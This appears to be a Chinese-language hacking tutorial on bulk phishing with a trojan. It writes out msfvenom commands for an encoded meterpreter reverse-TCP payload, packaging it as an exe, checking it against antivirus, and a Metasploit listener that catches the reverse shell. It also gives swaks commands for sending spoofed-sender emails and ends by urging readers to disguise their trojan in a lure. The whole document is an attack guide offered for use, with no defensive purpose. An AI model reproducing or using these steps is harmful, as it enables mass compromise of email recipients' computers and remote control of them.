0x00:前言
伪造邮件可以参考文章《伪造任意发件人进行邮件钓鱼》
其实也可以利用这个《利用office宏反弹shell》
今天普及新知识点
0x01:简介
Swaks是由John Jetmore编写和维护的一种功能强大,灵活,可脚本化,面向事务的SMTP测试工具。可向任意目标发送任意内容的邮件。
关于名字 “swaks”这个名字是”SWiss Army Knife Smtp”的首字母缩略词.
发布网站http://www.jetmore.org/john/code/swaks/
这个工具kali自带。没有kali里面啊D搞不定的站,有的话就加上明小子。
0x02:过程
1、先用kali生成payload
语法:msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.198.149 -e x86/shikata_ga_nai -i 11 -f py -o /opt/luomiweixiong.py
效果:
2、给原本的payload加点料
(灰色为加料代码)
(灰色为加料代码)
(灰色为加料代码)
公众号回复:001
获取此代码
3、代码编译
环境准备:pywin32 、pyinstall
语法:
python PyInstaller.py --console --onefile luomiweixiong.py
执行完X:/pyinstaller-2.0\luomiweixiong\dist目录生成luomiweixiong.exe
4、生成完毕,杀毒软件走起
本地杀软
在线查杀
0x03:上线验证
1、kali下启动msf,启动监听模式
use exploit/multi/handler
set lhost 192.168.198.149
set lport 6666
set PAYLOAD windows/meterpreter/reverse_tcp
exploit然后在win系统上执行luomiweixiong.exe,最终在msf反弹出meterprer 出来
(等等,说好的批量呢。ちょっと待ってください)
0x04:批量开始
神器语法
swaks -q rcpt -t 邮件地址
首先测试一下邮箱地址是否能伪造发送出去
报550为错误,报250为发送正确。
(亲测QQ邮箱不行、阿里邮箱、gmail邮箱可以,其他的等测试)
发送出去了
马上去看看邮箱
邮件内容自己编,伪造好你的木马。
灯光就位
音响就位
观众就位
请开始你的表演。